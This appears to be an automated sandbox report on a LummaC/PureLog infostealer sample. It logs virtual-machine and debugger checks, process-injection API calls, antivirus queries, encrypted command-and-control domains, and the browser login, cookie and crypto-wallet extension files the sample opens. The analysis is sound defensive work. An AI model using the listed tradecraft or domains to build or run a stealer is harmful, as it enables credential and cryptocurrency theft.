Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\mWAik6b.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\mWAik6b.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Memory allocated: 8C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Memory allocated: 24A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Memory allocated: 21F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe TID: 3056

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: mWAik6b.exe, 00000002.00000002.2277309695.000000000138D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8n=
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\mWAik6b.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_0043EF30 LdrInitializeThunk,

2_2_0043EF30

Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 0_2_024A7F65 mov edi, dword ptr fs:[00000030h]		0_2_024A7F65
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 0_2_024A80E2 mov edi, dword ptr fs:[00000030h]		0_2_024A80E2

Source: C:\Users\user\Desktop\mWAik6b.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 0_2_024A7F65 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_024A7F65

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\mWAik6b.exe

Memory written: C:\Users\user\Desktop\mWAik6b.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: growthselec.bond
Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immolatechallen.bond
Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crookedfoshe.bond
Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strivehelpeu.bond
Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cultureddirtys.click

Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"			Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"			Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Queries volume information: C:\Users\user\Desktop\mWAik6b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, mWAik6b.exe, 00000002.00000002.2277309695.000000000139B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\mWAik6b.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: mWAik6b.exe, type: SAMPLE
Source: Yara match	File source: 0.0.mWAik6b.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mWAik6b.exe.34a9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mWAik6b.exe.34a9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihk8
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
